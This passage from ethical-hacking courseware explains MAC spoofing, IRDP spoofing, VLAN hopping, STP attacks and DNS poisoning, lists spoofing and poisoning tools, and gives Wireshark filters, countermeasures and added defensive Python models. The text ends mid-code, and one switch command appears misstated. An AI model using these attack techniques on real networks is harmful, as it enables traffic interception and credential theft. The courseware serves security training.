1. Press Win + R to open Run, and type regedt32 to start the registry editor.
Note: Do not type Regedit to start the registry editor.
2. Go to "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}" and double-click on it to expand the tree.
3. Four-digit sub keys representing network adapters will be found (starting with 0000, 0001, 0002, etc.)
4. Search for the proper "DriverDesc" key to find the desired interface.
5. Right-click the appropriate subkey and add the new string value "NetworkAddress" (data type "REG_SZ") to contain the new MAC address.
6. Right-click on the "NetworkAddress" string value on the right side and select Modify.
7. Now, in the "Edit String" dialog box, enter the new MAC address in the "Value data" field and click "OK."
8. Disable and then re-enable the network interface that was changed, or reboot the system.

Figure 8.40: Registry Editor
MAC Spoofing Tools

- Technitium MAC Address Changer
Source: https://technitium.com
Technitium MAC Address Changer (TMAC) allows you to change (spoof) the MAC address of your NIC instantly. Every NIC has a MAC address hard-coded in its circuit by the manufacturer. This hard-coded MAC address is used by Windows drivers to access the Ethernet network (LAN). This tool can set a new MAC address to your NIC, bypassing the original hard-coded MAC address.

As shown in the screenshot, attackers can use TMAC to spoof or change their MAC address to perform an attack on the target system.

Figure 8.41: Screenshot of Technitium MAC Address Changer (TMAC)

Some examples of MAC spoofing tools are listed below:
- SMAC (http://www.klcconsulting.net)
- MAC Address Changer (https://www.novirusthanks.org)
- Change MAC Address (https://lizardsystems.com)
- Easy Mac Changer (https://github.com)
- Spoof-Me-Now (https://sourceforge.net)
IRDP Spoofing

ICMP Router Discovery Protocol (IRDP) is a routing protocol that allows a host to discover the IP addresses of active routers on its subnet by listening to router advertisement and solicitation messages on its network. The attacker can add default route entries on a system remotely by spoofing router advertisement messages. As IRDP does not require any authentication, the target host will prefer the default route defined by the attacker over the default route provided by the DHCP server. The attacker accomplishes this by setting the preference level and lifetime of the route at high values to ensure that the target hosts will choose it as the preferred route. This attack succeeds if the attacker launching the attack is on the same network as the victim.

In the case of a Windows system configured as a DHCP client, Windows checks the received router advertisements for entries. If there is only one, then it checks whether the IP source address is within the subnet. If so, then it adds the default route entry; otherwise, it ignores the advertisement.

Figure 8.42: IRDP spoofing

An attacker can use this to send spoofed router advertisement messages so that all the data packets travel through the attacker's system. Thus, the attacker can sniff the traffic and collect valuable information from the data packets. Attackers can use IRDP spoofing to launch MITM, DoS, and passive sniffing attacks.

- Passive Sniffing: In a switched network, the attacker spoofs IRDP traffic to re-route the outbound traffic of target hosts through the attacker's machine.
- MITM: Once sniffing starts, the attacker acts as a proxy between the victim and the destination. The attacker plays an MITM role and tries to modify the traffic.
- DoS: IRDP spoofing allows remote attackers to add wrong route entries into the victim's routing table. The wrong address entry causes DoS.

Prevent IRDP spoofing attacks by disabling IRDP on hosts, if the OS permits it.
VLAN Hopping

Virtual local area network (VLAN) hopping is a technique used to target network resources present on a VLAN. The main purpose behind a VLAN hopping attack is to gain access to the traffic flowing in other VLANs present in the same network, which is otherwise inaccessible. Networks usually have poor VLAN implementation or have misconfigurations that allow attackers to perform this type of attack. Attackers perform VLAN hopping attacks to steal sensitive information such as passwords; modify, corrupt, or delete data; install malicious codes or programs; or spread viruses, Trojans, and worms throughout the network.

VLAN hopping attacks can be performed via two primary methods, as given below:

- Switch Spoofing
Using switch spoofing, the attacker connects a rogue switch into the network by tricking a legitimate switch and thereby creating a trunk link between them. After establishing a trunk link, the traffic from multiple VLANs can be sent to and through the rogue switch, therefore allowing an attacker to sniff and view the packet content. This attack is successful only when the legitimate switch is configured to negotiate a trunk connection, or when the interface is configured with "dynamic auto," "dynamic desirable," or "trunk" mode.

Figure 8.43: Illustration of switch spoofing

- Double Tagging
Using double tagging, the attacker adds and modifies tags in the Ethernet frame, thereby allowing the flow of traffic through any VLAN in the network. The Ethernet frame that is sent by the attacker contains two 802.1Q tags, inner and outer; the inner tag is the VLAN tag of a target switch that the attacker wants to reach, and the outer tag is the native VLAN of the attacker. When the switch receives the Ethernet frame, it strips off the outer tag, as it is the same as the tag for the native VLAN, and forwards the frame with an inner tag on all its trunk interfaces. This allows an attacker to bypass the network mechanism by jumping from his native VLAN to the victim's VLAN(s), and also allows him/her to send the traffic to other VLANs. This attack is possible only if the switch ports are configured to use native VLANs.

Figure 8.44: Illustration of double tagging
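To make the double-tagging mechanism concrete, here is an added example (not from the courseware) that parses stacked 802.1Q tags out of an Ethernet frame, flags a double-tagged frame as something an access port should never see, and follows the frame through a simplified access-port-to-trunk path under the default configuration and under the two native-VLAN countermeasures (an unused native VLAN ID and a tagged native VLAN). Frame contents, MACs and VLAN numbers are constructed.

```python
"""Parser for stacked 802.1Q tags plus a small model of how a switch handles a
double-tagged frame on an access port, with and without the native-VLAN
countermeasures. Added example, not from the courseware; frames and VLAN
numbers are constructed for illustration."""
import struct

TPID_8021Q = 0x8100


def parse_vlan_tags(frame: bytes):
    """Return (dst_mac, src_mac, [vid, ...], ethertype, payload_offset).
    Every 0x8100 TPID is followed by a 2-byte TCI whose low 12 bits are the VID."""
    if len(frame) < 14:
        raise ValueError("frame too short for an Ethernet header")
    dst, src = frame[0:6], frame[6:12]
    off = 12
    vids = []
    (etype,) = struct.unpack_from("!H", frame, off)
    while etype == TPID_8021Q:
        tci, etype = struct.unpack_from("!HH", frame, off + 2)
        vids.append(tci & 0x0FFF)
        off += 4
    return dst.hex(":"), src.hex(":"), vids, etype, off + 2


def build_frame(dst, src, vids, ethertype, payload):
    """Constructed frame with the given tag stack (test data only)."""
    out = bytes.fromhex(dst.replace(":", "")) + bytes.fromhex(src.replace(":", ""))
    for vid in vids:
        out += struct.pack("!HH", TPID_8021Q, vid & 0x0FFF)
    return out + struct.pack("!H", ethertype) + payload


def is_double_tagged(frame):
    """True when a frame carries two or more stacked 802.1Q tags; on an access
    port this is never legitimate and is worth alerting on."""
    return len(parse_vlan_tags(frame)[2]) >= 2


def access_port_path(frame, access_vlan, trunk_native_vlan, tag_native=False):
    """Follow a frame from an access port across a trunk to the next switch.
    Returns ('dropped', None) or ('forwarded', VLAN seen by the downstream switch)."""
    _, _, vids, _, _ = parse_vlan_tags(frame)
    # Ingress: an access port accepts untagged frames or frames tagged with its own
    # VLAN, strips that one tag and assigns the frame to access_vlan.
    if vids and vids[0] != access_vlan:
        return ("dropped", None)
    remaining = vids[1:] if vids else []
    # Egress on the trunk: native-VLAN frames leave untagged unless the native VLAN
    # is explicitly tagged, so any leftover inner tag becomes the outer tag downstream.
    if access_vlan == trunk_native_vlan and not tag_native:
        downstream_vid = remaining[0] if remaining else trunk_native_vlan
    else:
        downstream_vid = access_vlan
    return ("forwarded", downstream_vid)


if __name__ == "__main__":
    f = build_frame("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", [1, 20], 0x0800, b"\x00" * 20)
    print("double tagged:", is_double_tagged(f))
    print("default config :", access_port_path(f, access_vlan=1, trunk_native_vlan=1))
    print("native vlan 999:", access_port_path(f, access_vlan=1, trunk_native_vlan=999))
    print("tagged native  :", access_port_path(f, 1, 1, tag_native=True))
```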
STP Attack

In a Spanning Tree Protocol (STP) attack, attackers connect a rogue switch into the network to change the operation of the STP protocol and sniff all the network traffic. STP is used in LAN switched networks with the primary function of removing potential loops within the network. STP ensures that the traffic inside the network follows an optimized path to enhance network performance. In this process, a switch inside the network is appointed as the root bridge. After the selection of the root bridge, other switches in the network connect to it by selecting a root port (the closest port to the root bridge).

The root bridge is selected with the help of Bridge Protocol Data Units (BPDUs). BPDUs each have an identification number known as a BID or ID. These BIDs consist of the Bridge Priority and the MAC address. By default, the value of the Bridge Priority is 32769.

If an attacker has access to two switches, he/she introduces a rogue switch in the network with a priority lower than any other switch in the network. This makes the rogue switch the root bridge, thus allowing the attacker to sniff all the traffic flowing in the network.

Figure 8.45: Illustration of an STP attack
How to Defend Against MAC Spoofing

Use DHCP Snooping Binding Table, Dynamic ARP Inspection, and IP Source Guard

Performing security assessments is the primary aim of an ethical hacker. An ethical hacker attacks a target network or organization with the knowledge and authorization of its management, to find loopholes in the security architecture. However, the job does not end there. Finding those loopholes is a minor task. The most crucial task of ethical hacking is to apply the appropriate countermeasures to security loopholes to fix them.

Once you have tested the network for MAC spoofing attacks and collected security loopholes, you should apply countermeasures to protect the network from further MAC spoofing. Many MAC spoofing countermeasures can be applied to specific network architectures and loopholes. Apply the appropriate countermeasures to your network.

To detect MAC spoofing, it is necessary to know all the MAC addresses in the network. The best way to defend against MAC address spoofing is to place the server behind the router. This is because routers depend only on IP addresses, whereas switches depend on MAC addresses for communication in a network. Making changes to the port security interface configuration is another way to prevent MAC spoofing attacks. Once you enable the port-security command, it allows you to specify the MAC address of the system connected to the specific port. It also allows for specific action to be taken if a port security violation occurs.

You can also implement the following techniques to defend against MAC address spoofing attacks:

- DHCP Snooping Binding Table: The DHCP snooping process filters untrusted DHCP messages and helps to build and bind a DHCP binding table. This table contains the MAC address, IP address, lease time, binding type, VLAN number, and interface information to correspond with untrusted interfaces of a switch. It acts as a firewall between untrusted hosts and DHCP servers. It also helps in differentiating between trusted and untrusted interfaces.
- Dynamic ARP Inspection: The system checks the IP-MAC address binding for each ARP packet in a network. While performing a DAI, the system will automatically drop invalid IP-MAC address bindings.
- IP Source Guard: IP Source Guard is a security feature in switches that restricts the IP traffic on untrusted layer 2 ports by filtering traffic based on the DHCP snooping binding database. It prevents spoofing attacks when the attacker tries to spoof or use the IP address of another host.
- Encryption: Encrypt the communication between the access point and computer to prevent MAC spoofing.
- Retrieval of MAC Address: You should always retrieve the MAC address from the NIC directly instead of retrieving it from the OS.
- Implementation of IEEE 802.1X Suites: This is a type of network protocol for port-based Network Access Control (PNAC), and its main purpose is to enforce access control at the point where a user joins the network.
- AAA (Authentication, Authorization, and Accounting): Use an AAA (Authentication, Authorization, and Accounting) server mechanism to filter MAC addresses subsequently.

Figure 8.46: Defending against MAC spoofing
How to Defend Against VLAN Hopping

Defend Against Switch Spoofing
Perform the following steps to configure a switch to prevent switch spoofing attacks:
- Explicitly configure the ports as access ports, and ensure that all access ports are configured not to negotiate trunks:
switchport mode access
switchport mode nonegotiate
- Ensure that all trunk ports are configured not to negotiate trunks:
switchport mode trunk
switchport mode nonegotiate

Defend Against Double Tagging
Perform the following steps to configure a switch to prevent double tagging attacks:
- Ensure that each access port is assigned with a VLAN except the default VLAN (VLAN 1):
switchport access vlan 2
- Ensure that native VLANs on all the trunk ports are changed to an unused VLAN ID:
switchport trunk native vlan 999
- Ensure that native VLANs on all the trunk ports are explicitly tagged:
vlan dot1q tag native
How to Defend Against STP Attacks

Implement the following countermeasures to defend against STP attacks on switches:

- BPDU Guard: BPDU guard must be enabled on the ports that should never receive a BPDU from their connected devices. This is used to avoid the transmission of BPDUs on PortFast-enabled ports. This feature helps in preventing potential bridging loops in the network. If BPDU guard is enabled on a switch interface and an unauthorized switch connects to it, the port will be set to errdisable mode when a BPDU is received. The errdisable mode shuts down the port and disables it from sending or receiving any traffic.
Use the following commands to enable BPDU guard on a switch interface:
configure terminal
interface gigabitethernet slot/port
spanning-tree portfast bpduguard
- Root Guard: Root guard protects the root bridge and ensures that it remains the root in the STP topology. It forces the interfaces to become the designated ports (forwarding ports) to prevent the nearby switches from becoming root switches. Therefore, if a port enabled with the root guard feature receives a superior BPDU, it converts that port into a loop inconsistent state (not errdisabled), thus protecting against an STP topology change. This port remains inactive only for that specific switch/switches attempting to change the STP topology. This port remains in down state until the issue is resolved.
Use the following commands to enable the root guard feature on a switch interface:
configure terminal
interface gigabitethernet slot/port
spanning-tree guard root
- Loop Guard: Loop guard improves the stability of the network by protecting it against bridging loops. It is generally used to protect against a malfunctioning switch.
Use the following commands to enable the loop guard feature on a switch interface:
configure terminal
interface gigabitethernet slot/port
spanning-tree guard loop
- UDLD (Unidirectional Link Detection): UDLD enables devices to detect the existence of unidirectional links and further disable the affected interfaces in the network. These unidirectional links in the network can cause STP topology loops.
Use the following command to enable UDLD on a switch interface:
configure terminal
interface gigabitethernet slot/port
udld { enable | disable | aggressive }
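An added example (not from the courseware or Cisco) that shows what BPDU guard and root guard act on: it decodes an 802.1D Configuration BPDU, compares its Root ID (priority and MAC, the BID described in the STP attack section) with the current root, and returns the port action for an edge port with BPDU guard, a port with root guard, and an unguarded port. Bridge priorities, MACs and timers in the test data are constructed.

```python
"""Decode an 802.1D Configuration BPDU and apply the BPDU guard / root guard
decision a switch port makes when one arrives. Added example, not from the
courseware or Cisco; bridge IDs, MACs and port names are constructed."""
import struct

LLC_STP = b"\x42\x42\x03"   # DSAP/SSAP 0x42 and UI control field carried by STP frames
BPDU_FMT = "!HBBBH6sIH6sHHHHH"   # 35-byte Configuration BPDU after the LLC header


def bridge_id(priority, mac):
    """Bridge ID as the 64-bit integer STP compares: priority in the top 16 bits, MAC below."""
    return (priority << 48) | int(mac.replace(":", "").replace(".", ""), 16)


def parse_config_bpdu(payload: bytes):
    """Parse LLC + Configuration BPDU; return root/bridge IDs and timers (seconds)."""
    if not payload.startswith(LLC_STP):
        raise ValueError("not an STP LLC frame")
    body = payload[3:]
    if len(body) < struct.calcsize(BPDU_FMT):
        raise ValueError("short BPDU")
    (proto, _version, bpdu_type, _flags, root_prio, root_mac, path_cost,
     br_prio, br_mac, port_id, _msg_age, max_age, hello, fwd_delay) = struct.unpack_from(
        BPDU_FMT, body, 0)
    if proto != 0 or bpdu_type != 0x00:
        raise ValueError("only Configuration BPDUs are handled here")
    return {
        "root_id": (root_prio << 48) | int.from_bytes(root_mac, "big"),
        "root_priority": root_prio,
        "root_mac": root_mac.hex(":"),
        "path_cost": path_cost,
        "bridge_id": (br_prio << 48) | int.from_bytes(br_mac, "big"),
        "port_id": port_id,
        "max_age": max_age / 256, "hello": hello / 256, "fwd_delay": fwd_delay / 256,
    }


def build_config_bpdu(root_prio, root_mac, br_prio, br_mac, path_cost=0, port_id=0x8001):
    """Constructed BPDU (test data), timers set to the 802.1D defaults 20/2/15 s."""
    rm = bytes.fromhex(root_mac.replace(":", ""))
    bm = bytes.fromhex(br_mac.replace(":", ""))
    return LLC_STP + struct.pack(BPDU_FMT, 0, 0, 0x00, 0x00, root_prio, rm, path_cost,
                                 br_prio, bm, port_id, 0, 20 * 256, 2 * 256, 15 * 256)


def port_decision(bpdu, current_root_id, guard=None):
    """What a port does with an incoming Configuration BPDU.
    guard: None, 'bpduguard' (PortFast edge port) or 'root' (root guard)."""
    if guard == "bpduguard":
        return "errdisable"             # any BPDU on an edge port shuts the port down
    superior = bpdu["root_id"] < current_root_id   # lower bridge ID wins the root election
    if guard == "root" and superior:
        return "root-inconsistent"      # port blocked until the superior BPDUs stop
    return "accept-superior" if superior else "accept"


if __name__ == "__main__":
    current_root = bridge_id(32769, "00:11:22:33:44:01")
    rogue = parse_config_bpdu(build_config_bpdu(4097, "00:de:ad:be:ef:01", 4097, "00:de:ad:be:ef:01"))
    for guard in ("bpduguard", "root", None):
        print(guard, "->", port_decision(rogue, current_root, guard))
```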
Sniffing Technique: DNS Poisoning

This section describes DNS poisoning techniques to sniff the DNS traffic of a target network. Using this technique, an attacker can obtain the ID of the DNS request by sniffing and can send a malicious reply to the sender before the actual DNS server responds.

DNS Poisoning Techniques

DNS is the protocol that translates a domain name (e.g., www.eccouncil.org) into an IP address (e.g., 208.66.172.56). The protocol uses DNS tables that contain the domain name and its equivalent IP address stored in a distributed large database. In DNS poisoning, also known as DNS spoofing, the attacker tricks a DNS server into believing that it has received authentic information when, in reality, it has not received any. The attacker tries to redirect the victim to a malicious server instead of the legitimate server. The attacker does this by manipulating the DNS table entries in the DNS. This results in substitution of a false IP address at the DNS level, where web addresses are converted into numeric addresses.

When the victim tries to access a website, the attacker manipulates the entries in the DNS table so that the victim's system redirects the URL to the attacker's server. The attacker replaces the IP address entries for a target site on a given DNS server with the IP address of the server (malicious server) he/she controls. The attacker can create fake DNS entries for the server (containing malicious content) with the same names as that of the target server. Thus, the victim connects to the attacker's server without realizing it. Once the victim connects to the attacker's server, the attacker can compromise the victim's system and steal data.

DNS poisoning is possible using the following techniques:
- Intranet DNS Spoofing
- Internet DNS Spoofing
- Proxy Server DNS Poisoning
- DNS Cache Poisoning
Intranet DNS Spoofing

An attacker can perform an intranet DNS spoofing attack on a switched LAN with the help of the ARP poisoning technique. To perform this attack, the attacker must be connected to the LAN and be able to sniff the traffic or packets. An attacker who succeeds in sniffing the ID of the DNS request from the intranet can send a malicious reply to the sender before the actual DNS server.

The diagram describes how an attacker performs an intranet DNS spoofing.

Figure 8.47: Intranet DNS spoofing

In the diagram, the attacker poisons the router by running arpspoof/dnsspoof to redirect DNS requests of clients to the attacker's machine. When a client (John) sends a DNS request to the router, the poisoned router sends the DNS request packet to the attacker's machine. Upon receiving the DNS request, the attacker sends a fake DNS response that redirects the client to a fake website set up by the attacker. The attacker owns the website and can see all the information submitted by the client to that website. Thus, the attacker can sniff sensitive data, such as passwords, submitted to the fake website. The attacker retrieves the required information and then redirects the client to the real website.
Internet DNS Spoofing

Internet DNS poisoning is also known as remote DNS poisoning. Attackers can perform DNS spoofing attacks on a single victim or on multiple victims anywhere in the world. To perform this attack, the attacker sets up a rogue DNS server with a static IP address. Attackers perform Internet DNS spoofing with the help of Trojans when the victim's system connects to the Internet. This is an MITM attack in which the attacker changes the primary DNS entries of the victim's computer. The attacker replaces the victim's DNS IP address with a fake IP address that resolves to the attacker's system. Thus, the victim's traffic redirects to the attacker's system. At this point, the attacker can easily sniff the victim's confidential information.

The figure illustrates an attacker performing Internet DNS spoofing. The attacker infects John's machine with a Trojan and changes his DNS IP address to that of the attacker.
Proxy Server DNS Poisoning

In the proxy server DNS poisoning technique, the attacker sets up a proxy server on the attacker's system. The attacker also configures a fraudulent DNS and makes its IP address a primary DNS entry in the proxy server. The attacker changes the proxy server settings of the victim with the help of a Trojan. The proxy serves as a primary DNS and redirects the victim's traffic to the fake website, where the attacker can sniff the confidential information of the victim and then redirect the request to the real website.

As shown in the figure, an attacker sends a Trojan to John's machine that changes his proxy server settings in Internet Explorer to those of the attacker, and redirects the request to a fake website.

Figure 8.49: Proxy server DNS poisoning
DNS Cache Poisoning

DNS cache poisoning refers to altering or adding forged DNS records in the DNS resolver cache so that a DNS query is redirected to a malicious site. The DNS system uses cache memory to hold the recently resolved domain names. The attacker populates it with recently used domain names and their respective IP address entries. When a user request is received, the DNS resolver first checks the DNS cache; if the system finds the domain name that the user requested in the cache, the resolver will quickly send its respective IP address. Thus, it reduces the traffic and time of DNS resolving.

Attackers target and make changes or add entries to this DNS cache. If the DNS resolver cannot validate that the DNS responses have come from an authoritative source, it will cache the incorrect entries locally and serve them to users who make the same request. The attacker replaces the user-requested IP address with the fake IP address and, when the user requests that domain name, the DNS resolver checks the entry in the DNS cache and picks the matched (poisoned) entry. Then, it redirects the victim to the attacker's fake server instead of the intended server.
DNS Poisoning Tools

DNS poisoning tools allow attackers to redirect a domain name to a different IP address listed in a fake DNS entry file. The DNS request made to the target site goes through a server containing malicious content with the same name.

- DerpNSpoof
  Source: https://github.com
  DerpNSpoof is a DNS poisoning tool that assists in spoofing the DNS query packet of a certain IP address or a group of hosts in the network. Using this tool, attackers can create a list of fake DNS records and load it while running the tool to redirect the victim to some other website.

Figure 8.51: Screenshot of DerpNSpoof tool

Some examples of additional DNS poisoning tools are listed below:

- DNS Spoof (https://github.com)
- DNS-poison (https://github.com)
- Ettercap (http://www.ettercap-project.org)
- Evilgrade (https://github.com)
- TORNADO (https://github.com)
How to Defend Against DNS Spoofing

Major DNS implementations have reported attacks using DNS spoofing, and this vulnerability still affects a large number of organizations. This is because of a lack of information when performing DNS queries, which allows attackers to spoof DNS responses. You have seen how an attacker carries out different types of DNS spoofing attacks. We now look at how to defend a network from these types of attacks.

Countermeasures that help prevent DNS spoofing attacks:

- Implement Domain Name System Security Extension (DNSSEC)
- Use Secure Socket Layer (SSL) for securing the traffic
- Resolve all DNS queries to a local DNS server
- Block DNS requests being sent to external servers
- Configure a firewall to restrict external DNS lookup
- Implement an intrusion detection system (IDS) and deploy it correctly
- Configure the DNS resolver to use a new random source port for each outgoing query
- Restrict the DNS recursing service, either full or partial, to authorized users
- Use DNS non-existent domain (NXDOMAIN) rate limiting
- Secure your internal machines
- Use static ARP and IP tables
- Use SSH encryption
- Do not allow outgoing traffic to use UDP port 53 as a default source port
- Audit the DNS server regularly to remove vulnerabilities
- Use sniffing detection tools
- Do not open suspicious files
- Always use trusted proxy sites
- If a company handles its own resolver, it should be kept private and well protected
- Randomize source and destination IP addresses
- Randomize Query ID
- Randomize case in the name requests
- Use Public Key Infrastructure (PKI) to protect the server
- Maintain a single or specific range of IP addresses to login to the systems
- Implement packet filtering for both inbound and outbound traffic
- Restrict DNS zone transfers to a limited set of IP addresses
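Three of the countermeasures above (a fresh random source port per query, a random query ID, and never caching an answer the resolver cannot tie to a question it asked) can be modelled in a few lines. The block below is an added example written for this page, not EC-Council code and not any real resolver's implementation: a stub resolver that remembers each outstanding query by (transaction ID, source port) and discards any response that does not match it; every name and address in it is constructed.

```python
import random
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class DnsQuery:
    txid: int        # 16-bit transaction ID
    src_port: int    # UDP source port the query left from
    qname: str
    qtype: str = "A"


@dataclass(frozen=True)
class DnsResponse:
    txid: int
    dst_port: int    # UDP port the response was delivered to
    qname: str
    qtype: str
    rdata: str
    rcode: str = "NOERROR"


class ValidatingResolver:
    """Stub resolver that only caches responses matching an outstanding query.

    A response is accepted only if (txid, dst_port) matches a query that is still
    pending and its question section equals the one that was asked. With both
    values drawn from (almost) the full 16-bit space, a blind forger has to guess
    roughly 32 bits instead of the 16 bits a fixed source port would leave.
    """

    def __init__(self, rng: Optional[random.Random] = None) -> None:
        self.rng = rng or random.SystemRandom()
        self.pending: Dict[Tuple[int, int], DnsQuery] = {}
        self.cache: Dict[Tuple[str, str], str] = {}
        self.rejected: List[Tuple[str, DnsResponse]] = []

    @staticmethod
    def _norm(name: str) -> str:
        return name.lower().rstrip(".")

    def send_query(self, qname: str, qtype: str = "A") -> DnsQuery:
        txid = self.rng.randrange(0, 1 << 16)
        # fresh ephemeral port per query; never the fixed port 53 the text warns against
        src_port = self.rng.randrange(1024, 1 << 16)
        query = DnsQuery(txid, src_port, self._norm(qname), qtype)
        self.pending[(txid, src_port)] = query
        return query

    def receive(self, resp: DnsResponse) -> bool:
        query = self.pending.get((resp.txid, resp.dst_port))
        if query is None:
            self.rejected.append(("no pending query with this ID/port", resp))
            return False
        if (self._norm(resp.qname), resp.qtype) != (query.qname, query.qtype):
            self.rejected.append(("question section mismatch", resp))
            return False
        del self.pending[(resp.txid, resp.dst_port)]   # one answer per question
        if resp.rcode == "NOERROR":
            self.cache[(query.qname, query.qtype)] = resp.rdata
        return True


def run_scenario(seed: int = 7) -> dict:
    """Constructed scenario: a forged, a genuine and a replayed response for one query."""
    resolver = ValidatingResolver(random.Random(seed))
    query = resolver.send_query("www.example.com")

    # Blind forgery (constructed): the attacker has the right ID but assumes the
    # resolver still sends every query from port 53
    forged = DnsResponse(query.txid, 53, "www.example.com", "A", "203.0.113.9")
    forged_accepted = resolver.receive(forged)

    # Genuine answer arrives on the port the query actually left from
    genuine = DnsResponse(query.txid, query.src_port, "www.example.com", "A", "198.51.100.20")
    genuine_accepted = resolver.receive(genuine)

    # A late duplicate of the genuine answer must not be accepted a second time
    replayed_accepted = resolver.receive(genuine)

    return {
        "forged_accepted": forged_accepted,
        "genuine_accepted": genuine_accepted,
        "replayed_accepted": replayed_accepted,
        "cached": resolver.cache.get(("www.example.com", "A")),
        "rejections": [reason for reason, _ in resolver.rejected],
    }


if __name__ == "__main__":
    print(run_scenario())
```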
Module Flow

Sniffing Tools

System administrators use automated tools to monitor their network, but attackers misuse these tools to sniff network data. This section describes tools that an attacker can use for sniffing.
Sniffing Tool: Wireshark

Wireshark
Source: https://www.wireshark.org

Wireshark lets you capture and interactively browse the traffic running on a computer network. This tool uses WinPcap to capture packets on its own supported networks. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. The captured files can be programmatically edited via the command-line. A set of filters for customized data display can be refined using a display filter.

As shown in the screenshot, attackers use Wireshark to sniff and analyze the packet flow in the target network and extract critical information about the target.

Figure 8.52: Capturing packets using Wireshark
Follow TCP Stream in Wireshark

Source: https://www.wireshark.org

Wireshark displays data from the TCP port with a feature known as "Follow TCP stream." The tool sees TCP data in the same way as that of the application layer. Use this tool to find passwords in a telnet session or to interpret a data stream.

To see the TCP stream, select a TCP packet in the packet list of a stream/connection and then select the Follow TCP Stream menu item from the Wireshark Tools menu. Wireshark displays all the data from the TCP stream by setting an appropriate display filter. The tool displays the streaming content in the same sequence as it appeared on the network. It displays the captured data in ASCII, EBCDIC, hexdump, C array, or raw formats.

As shown in the screenshot, attackers can capture network traffic and gain the credentials of a target machine. They attempt to capture its remote interface and monitor the traffic generated from a user's browsing activities to extract confidential user information.

Figure 8.54: Wireshark Follow TCP Stream feature
Display Filters in Wireshark

Source: https://wiki.wireshark.org

Wireshark features display filters that filter traffic on the target network by protocol type, IP address, port, etc. Display filters are used to change the view of packets in the captured files. To set up a filter, type the protocol name, such as arp, http, tcp, udp, dns, and ip, in the filter box of Wireshark. Wireshark can use multiple filters at a time.

Some of the display filters in Wireshark are listed below:

- Display Filtering by Protocol Type
  Example: type the protocol in the filter box: arp, http, tcp, udp, dns, ip
- Monitoring the Specific Ports
  tcp.port==23
  ip.addr==192.168.1.100 (machine)
  ip.addr==192.168.1.100 && tcp.port==23
- Filtering by Multiple IP Addresses
  ip.addr==10.0.0.4 or ip.addr==<second address>
- Filtering by IP Address
  ip.addr==10.0.0.4
- Other Filters
  ip.dst==10.0.1.50 && frame.pkt_len > 400
  ip.addr==10.0.1.12 && icmp && frame.number > 15 && frame.number < 30
  ip.src==205.153.63.30 or ip.dst==205.153.63.30
Additional Wireshark Filters

Source: https://wiki.wireshark.org

Some examples of additional Wireshark filters are listed below:

- tcp.flags.reset==1
  Displays all TCP resets
- udp contains 33:27:58
  Sets a filter for the hex values of 0x33 0x27 0x58 at any offset
- http.request
  Displays all HTTP GET requests
- tcp.analysis.retransmission
  Displays all retransmissions in the trace
- tcp contains traffic
  Displays all TCP packets that contain the word "traffic"
- !(arp or icmp or dns)
  Masks out arp, icmp, dns, or other protocols and allows you to view the traffic of your interest
- tcp.port==4000
  Sets a filter for any TCP packet with 4000 as a source or destination port
- tcp.port eq 25 or icmp
  Displays only SMTP (port 25) and ICMP traffic
- ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
  Displays only traffic in the LAN (192.168.x.x), between workstations and servers (no Internet)
- ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip
  Filters by a protocol (e.g., SIP) and filters out unwanted IPs
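To make concrete how the display filters in this section and the previous one are evaluated, here is an added example written for this page (not code from the Wireshark project): it tokenizes a filter, parses comparisons (==, !=, <, >, CIDR values), bare protocol names, !, && and || (plus the and/or/not/eq word forms) with the usual precedence, and runs the result over a constructed set of packet summaries. The `contains` operator, hex matching and fields such as tcp.flags or tcp.analysis are deliberately out of scope; the packets and addresses are constructed, not captured traffic.

```python
import ipaddress
import operator
import re

FIELD_ALIASES = {"ip.addr": ("ip.src", "ip.dst"), "tcp.port": ("tcp.srcport", "tcp.dstport"),
                 "udp.port": ("udp.srcport", "udp.dstport")}  # multi-valued fields
WORD_OPS = {"and": "&&", "or": "||", "not": "!", "eq": "==", "ne": "!=", "gt": ">", "lt": "<"}
COMPARE = {"==": operator.eq, "!=": operator.ne, "<": operator.lt, ">": operator.gt,
           "<=": operator.le, ">=": operator.ge}
_TOKEN = re.compile(r"\s*(?:(\(|\))|(&&|\|\||==|!=|<=|>=|<|>|!)|([A-Za-z_][\w.]*)|(\d[\w.:/]*))")

def tokenize(text):
    """Split a display filter into (kind, text) tokens; word operators become symbols."""
    tokens, pos, text = [], 0, text.strip()
    while pos < len(text):
        m = _TOKEN.match(text, pos)
        if not m:
            raise ValueError(f"cannot tokenize filter near {text[pos:]!r}")
        pos, (paren, op, word, value) = m.end(), m.groups()
        if paren or op:
            tokens.append(("paren", paren) if paren else ("op", op))
        elif word:
            tokens.append(("op", WORD_OPS[word]) if word in WORD_OPS else ("field", word))
        else:
            tokens.append(("value", value))
    return tokens

def _matches(pkt, field, op, wanted):
    """Wireshark 'any' semantics: true if any instance of the field satisfies the comparison."""
    for actual in (pkt[n] for n in FIELD_ALIASES.get(field, (field,)) if n in pkt):
        if isinstance(actual, str) and "/" in wanted:  # CIDR value, e.g. ip.src==192.168.0.0/16
            if ipaddress.ip_address(actual) in ipaddress.ip_network(wanted, strict=False):
                return True
        elif COMPARE[op](actual, int(wanted) if isinstance(actual, int) else wanted):
            return True
    return False

class FilterEvaluator:
    """Recursive descent (|| level > && level > unary/primary) evaluated against one packet."""
    _LEVELS = (("||", lambda a, b: a or b), ("&&", lambda a, b: a and b))

    def __init__(self, tokens, pkt):
        self.toks, self.i, self.pkt = tokens, 0, pkt

    def _next(self, consume=False):
        tok = self.toks[self.i] if self.i < len(self.toks) else (None, None)
        self.i += consume  # True advances by one token
        return tok

    def evaluate(self):
        result = self._binary()
        if self.i != len(self.toks):
            raise ValueError(f"unexpected token {self.toks[self.i][1]!r}")
        return result

    def _binary(self, level=0):
        if level == len(self._LEVELS):
            return self._primary()
        symbol, combine = self._LEVELS[level]
        result = self._binary(level + 1)
        while self._next() == ("op", symbol):
            self._next(consume=True)
            result = combine(self._binary(level + 1), result)  # right side parsed first so its tokens are consumed
        return result

    def _primary(self):
        kind, text = self._next(consume=True)
        if (kind, text) == ("op", "!"):
            return not self._primary()
        if (kind, text) == ("paren", "("):
            result = self._binary()
            if self._next(consume=True) != ("paren", ")"):
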